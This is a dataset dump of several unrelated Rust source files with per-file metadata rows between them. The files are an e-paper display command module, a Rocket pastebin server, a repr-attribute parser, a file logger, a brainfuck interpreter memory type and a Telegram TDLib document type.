pub fn load_lut(mut self) -> Self {
self.0.set_bit(4, true);
self
}
pub fn load_temp(mut self) -> Self {
self.0.set_bit(5, true);
self
}
pub fn enable_clock(mut self) -> Self {
self.0.set_bit(6, true);
self
}
pub fn enable_analog(mut self) -> Self {
self.0.set_bit(7, true);
self
}
}
#[allow(dead_code, clippy::enum_variant_names)]
pub(crate) enum DataEntryModeIncr {
XDecrYDecr = 0x0,
XIncrYDecr = 0x1,
XDecrYIncr = 0x2,
XIncrYIncr = 0x3,
}
#[allow(dead_code)]
pub(crate) enum DataEntryModeDir {
XDir = 0x0,
YDir = 0x4,
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum BorderWaveFormVbd {
Gs = 0x0,
FixLevel = 0x1,
Vcom = 0x2,
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum BorderWaveFormFixLevel {
Vss = 0x0,
Vsh1 = 0x1,
Vsl = 0x2,
Vsh2 = 0x3,
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum BorderWaveFormGs {
Lut0 = 0x0,
Lut1 = 0x1,
Lut2 = 0x2,
Lut3 = 0x3,
}
pub(crate) struct BorderWaveForm {
pub vbd: BorderWaveFormVbd,
pub fix_level: BorderWaveFormFixLevel,
pub gs_trans: BorderWaveFormGs,
}
impl BorderWaveForm {
pub fn to_u8(&self) -> u8 {
*0u8.set_bits(6..8, self.vbd as u8)
.set_bits(4..6, self.fix_level as u8)
.set_bits(0..2, self.gs_trans as u8)
}
}
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub enum DeepSleepMode {
// Sleeps and keeps access to RAM and controller
Normal = 0x00,
// Sleeps without access to RAM/controller but keeps RAM content
Mode1 = 0x01,
// Same as MODE_1 but RAM content is not kept
Mode2 = 0x11,
}
pub(crate) struct GateDrivingVoltage(pub u8);
pub(crate) struct SourceDrivingVoltage(pub u8);
pub(crate) struct Vcom(pub u8);
pub(crate) trait I32Ext {
fn vcom(self) -> Vcom;
fn gate_driving_decivolt(self) -> GateDrivingVoltage;
fn source_driving_decivolt(self) -> SourceDrivingVoltage;
}
impl I32Ext for i32 {
// This is really not very nice. Until I find something better, this will be
// a placeholder.
fn vcom(self) -> Vcom {
assert!((-30..=-2).contains(&self));
let u = match -self {
2 => 0x08,
3 => 0x0B,
4 => 0x10,
5 => 0x14,
6 => 0x17,
7 => 0x1B,
8 => 0x20,
9 => 0x24,
10 => 0x28,
11 => 0x2C,
12 => 0x2F,
13 => 0x34,
14 => 0x37,
15 => 0x3C,
16 => 0x40,
17 => 0x44,
18 => 0x48,
19 => 0x4B,
20 => 0x50,
21 => 0x54,
22 => 0x58,
23 => 0x5B,
24 => 0x5F,
25 => 0x64,
26 => 0x68,
27 => 0x6C,
28 => 0x6F,
29 => 0x73,
30 => 0x78,
_ => 0,
};
Vcom(u)
}
fn gate_driving_decivolt(self) -> GateDrivingVoltage {
assert!((100..=210).contains(&self) && self % 5 == 0);
GateDrivingVoltage(((self - 100) / 5 + 0x03) as u8)
}
fn source_driving_decivolt(self) -> SourceDrivingVoltage {
assert!((24..=88).contains(&self) || (self % 5 == 0 && (90..=180).contains(&self.abs())));
if (24..=88).contains(&self) {
SourceDrivingVoltage(((self - 24) + 0x8E) as u8)
} else if (90..=180).contains(&self) {
SourceDrivingVoltage(((self - 90) / 2 + 0x23) as u8)
} else {
SourceDrivingVoltage((((-self - 90) / 5) * 2 + 0x1A) as u8)
}
}
}
impl traits::Command for Command {
/// Returns the address of the command
fn address(self) -> u8 {
self as u8
}
}
| true |
fb06622a0d953880b8045215e89167c33ed45cf8
|
Rust
|
ioncodes/thicc
|
/src/server.rs
|
UTF-8
| 2,093 | 2.65625 | 3 |
[] |
no_license
|
use rocket::response::{Redirect, NamedFile};
use rocket::Config;
use rocket::config::Environment;
use rocket::response::content::Html;
use rocket_contrib::json::Json;
use rocket_contrib::serve::StaticFiles;
use askama::Template;
use crate::db::Db;
use crate::constants::{PROTOCOL, HOSTNAME, PORT};
use crate::create_template::CreateTemplate;
use crate::paste_template::PasteTemplate;
use crate::paste::Paste;
use std::path::Path;
pub struct Server { }
#[get("/create")]
fn create_html() -> Html<String> {
let template = CreateTemplate { protocol: PROTOCOL, host: HOSTNAME, port: &PORT.to_string()[..] };
Html(template.render().unwrap())
}
#[post("/create", format = "application/json", data = "<paste>")]
fn create_paste(paste: Json<Paste>) -> String {
let id = Db::create_paste(paste.0);
id
}
#[get("/<id>")]
fn paste(id: String) -> Html<String> {
let paste = Db::get_paste(id);
let language: &str = &paste.language;
let decoded = String::from(std::str::from_utf8(&base64::decode(&paste.code).unwrap()).unwrap());
let code = &urldecode::decode(decoded)[..];
let template = PasteTemplate { code , language };
Html(template.render().unwrap())
}
#[get("/<id>/raw")]
fn paste_raw(id: String) -> String {
let paste = Db::get_paste(id);
let decoded = String::from(std::str::from_utf8(&base64::decode(&paste.code).unwrap()).unwrap());
let code = urldecode::decode(decoded);
code
}
#[get("/favicon.ico")]
fn icon() -> Option<NamedFile> {
NamedFile::open(Path::new("static/icons/favicon.ico")).ok()
}
impl Server {
pub fn new() -> Server { Server { } }
pub fn start(&self) {
Db::initialize();
let config = Config::build(Environment::Staging)
.address("0.0.0.0")
.port(7000)
.finalize()
.unwrap();
rocket::custom(config)
.mount("/js", StaticFiles::from("static/js"))
.mount("/css", StaticFiles::from("static/css"))
.mount("/", routes![create_html, create_paste, paste, paste_raw, icon])
.launch();
}
}
| true |
0047af285b5e7e7354b94cc8feb95c97142a587d
|
Rust
|
rodrimati1992/zeroable_crates
|
/zeroable_derive/src/repr_attr.rs
|
UTF-8
| 2,575 | 2.828125 | 3 |
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
use crate::attribute_parsing_shared::with_nested_meta;
use quote::ToTokens;
use syn::{Meta, NestedMeta};
////////////////////////////////////////////////////////////////////////////////
#[derive(Debug, Copy, Clone, PartialEq)]
#[allow(dead_code)]
pub(crate) enum ReprAttr {
C { integer_repr: bool },
IntegerRepr,
Transparent,
Rust,
}
#[derive(Copy, Clone)]
pub(crate) struct ReprAttrBuilder {
c: bool,
integer: bool,
transparent: bool,
}
impl ReprAttr {
pub fn new<I>(iter: I) -> Result<Self, syn::Error>
where
I: IntoIterator<Item = NestedMeta>,
{
const REPR_RUST: ReprAttrBuilder = ReprAttrBuilder {
c: false,
integer: false,
transparent: false,
};
let mut this = REPR_RUST;
fn inner_err(tokens: &dyn ToTokens) -> syn::Error {
spanned_err!(tokens, "Unrecognized repr attribute")
}
with_nested_meta("repr", iter, |attr| match attr {
Meta::Path(ref path) => {
let ident = path.get_ident().ok_or_else(|| inner_err(path))?;
if ident == "C" {
this.c = true;
} else if ident == "transparent" {
this.transparent = true;
} else if is_integer_type(ident) {
this.integer = true;
} else {
return Err(inner_err(ident));
}
Ok(())
}
Meta::List(ref list) if list.path.is_ident("align") => Ok(()),
x => Err(inner_err(&x)),
})?;
// Ignoring these invalid combinations because Rust already
// emits an error for them:
// - #[repr(transparent,C)]
// - #[repr(transparent,<integer_type>)]
match (this.c, this.integer, this.transparent) {
(true, integer_repr, _) => Ok(ReprAttr::C { integer_repr }),
(false, true, _) => Ok(ReprAttr::IntegerRepr),
(false, false, true) => Ok(ReprAttr::Transparent),
(false, false, false) => Ok(ReprAttr::Rust),
}
}
}
macro_rules! matches_one_integer_repr {
( $matches:ident => $( $repr:expr ),* $(,)* ) => (
match () {
$(() if $matches == $repr => true,)*
_=>false
}
)
}
fn is_integer_type(ident: &syn::Ident) -> bool {
matches_one_integer_repr! {
ident=>
"u8","i8",
"u16","i16",
"u32","i32",
"u64","i64",
"u128","i128",
"usize","isize",
}
}
| true |
b012cb5891909a401ae35f83aa4100318085b564
|
Rust
|
Rolledm/sip-server-rust
|
/src/logger.rs
|
UTF-8
| 1,973 | 3.484375 | 3 |
[] |
no_license
|
use lazy_static::lazy_static;
use std::sync::Mutex;
use chrono::Utc;
use std::fs::File;
use std::io::prelude::*;
lazy_static! {
static ref LOGGER: Mutex<Option<Logger>> = Mutex::new(None);
}
#[derive(Debug)]
pub enum Severity {
Debug,
Info,
Warning,
Error,
Fatal,
}
fn severity_to_number(severity: Severity) -> u32 {
match severity {
Severity::Fatal => 1,
Severity::Error => 2,
Severity::Warning => 3,
Severity::Info => 4,
Severity::Debug => 5,
}
}
fn number_to_string(number: u32) -> &'static str {
match number {
1 => "FATAL",
2 => "ERROR",
3 => "WARNING",
4 => "INFO",
5 => "DEBUG",
_ => ""
}
}
#[derive(Debug)]
pub struct Logger {
max_severity: u32,
file: File,
}
pub fn log(severity: Severity, text: &str) {
let mut logger = Logger::get_instance().lock().unwrap();
match &mut *logger {
None => (),
Some(logger) => logger.log(severity_to_number(severity), text),
};
}
impl Logger {
pub fn init(max_severity: Severity, file: &str) {
let mut logger = LOGGER.lock().unwrap();
if logger.is_none() {
*logger = Some(Logger {
max_severity: severity_to_number(max_severity),
file: File::create(file).unwrap(),
});
} else {
panic!("Logger already initialized!")
}
}
pub fn get_instance() -> &'static Mutex<Option<Self>> {
if LOGGER.lock().unwrap().is_some() {
&LOGGER
} else {
panic!("Logger not initialized!")
}
}
pub fn log(&mut self, severity: u32, text: &str) {
if severity <= self.max_severity {
let message = format!("{} | {} | {}\n", number_to_string(severity), Utc::now().format("%H:%M:%S"), text);
print!("{}", message);
self.file.write(message.as_bytes()).unwrap();
}
}
}
| true |
11ef92471a9fb92ace20c121e21ffeb8f90639ec
|
Rust
|
Dragoteryx/brainfuck
|
/src/memory/memory32.rs
|
UTF-8
| 1,907 | 3.203125 | 3 |
[] |
no_license
|
use crate::{Args, Error, Memory};
#[derive(Debug)]
pub struct Memory32<'a> {
memory: Vec<u32>,
pointer: u32,
args: &'a Args
}
impl Memory32<'_> {
pub fn new<'a>(args: &'a Args) -> Memory32<'a> {
Memory32 {
memory: vec![0; u32::from(args.memory_size) as usize],
pointer: 0,
args
}
}
}
impl Memory<u32> for Memory32<'_> {
fn args(&self) -> &Args {
self.args
}
fn size(&self) -> u32 {
self.args.memory_size.into()
}
fn null() -> u32 {
0
}
// pointer
fn pointer(&self) -> u32 {
self.pointer
}
fn pointer_mut(&mut self) -> &mut u32 {
&mut self.pointer
}
// memory
fn value(&self, pointer: u32) -> u32 {
self.memory[pointer as usize]
}
fn value_mut(&mut self, pointer: u32) -> &mut u32 {
&mut self.memory[pointer as usize]
}
fn value_is_null(&self, value: u32) -> bool {
value == 0
}
fn add_value(&self, pointer: u32, n: u32) -> Result<u32, Error> {
if self.args.no_overflows {
match self.value(pointer).checked_add(n) {
None => Err(Error::PositiveOverflow(pointer)),
Some(ok) => Ok(ok)
}
} else {
Ok(self.value(pointer).wrapping_add(n))
}
}
fn sub_value(&self, pointer: u32, n: u32) -> Result<u32, Error> {
if self.args.no_overflows {
match self.value(pointer).checked_sub(n) {
None => Err(Error::NegativeOverflow(pointer)),
Some(ok) => Ok(ok)
}
} else {
Ok(self.value(pointer).wrapping_sub(n))
}
}
// conversions
fn value_to_u32(value: u32) -> u32 {
value
}
fn value_to_string(value: u32) -> String {
value.to_string()
}
fn value_to_char(value: u32) -> Result<char, Error> {
match char::from_u32(value) {
None => Err(Error::InvalidUnicode(value)),
Some(char) => Ok(char)
}
}
fn char_to_value(char: char) -> Result<u32, Error> {
Ok(char as u32)
}
}
| true |
e6fbf3e270217994db6821a1356fd7d053786a34
|
Rust
|
himlpplm/rust-tdlib
|
/src/types/input_personal_document.rs
|
UTF-8
| 2,161 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
use crate::errors::*;
use crate::types::*;
use uuid::Uuid;
/// A personal document to be saved to Telegram Passport
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct InputPersonalDocument {
#[doc(hidden)]
#[serde(rename(serialize = "@extra", deserialize = "@extra"))]
extra: Option<String>,
#[serde(rename(serialize = "@client_id", deserialize = "@client_id"))]
client_id: Option<i32>,
/// List of files containing the pages of the document
files: Vec<InputFile>,
/// List of files containing a certified English translation of the document
translation: Vec<InputFile>,
}
impl RObject for InputPersonalDocument {
#[doc(hidden)]
fn extra(&self) -> Option<&str> {
self.extra.as_deref()
}
#[doc(hidden)]
fn client_id(&self) -> Option<i32> {
self.client_id
}
}
impl InputPersonalDocument {
pub fn from_json<S: AsRef<str>>(json: S) -> RTDResult<Self> {
Ok(serde_json::from_str(json.as_ref())?)
}
pub fn builder() -> RTDInputPersonalDocumentBuilder {
let mut inner = InputPersonalDocument::default();
inner.extra = Some(Uuid::new_v4().to_string());
RTDInputPersonalDocumentBuilder { inner }
}
pub fn files(&self) -> &Vec<InputFile> {
&self.files
}
pub fn translation(&self) -> &Vec<InputFile> {
&self.translation
}
}
#[doc(hidden)]
pub struct RTDInputPersonalDocumentBuilder {
inner: InputPersonalDocument,
}
impl RTDInputPersonalDocumentBuilder {
pub fn build(&self) -> InputPersonalDocument {
self.inner.clone()
}
pub fn files(&mut self, files: Vec<InputFile>) -> &mut Self {
self.inner.files = files;
self
}
pub fn translation(&mut self, translation: Vec<InputFile>) -> &mut Self {
self.inner.translation = translation;
self
}
}
impl AsRef<InputPersonalDocument> for InputPersonalDocument {
fn as_ref(&self) -> &InputPersonalDocument {
self
}
}
impl AsRef<InputPersonalDocument> for RTDInputPersonalDocumentBuilder {
fn as_ref(&self) -> &InputPersonalDocument {
&self.inner
}
}
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.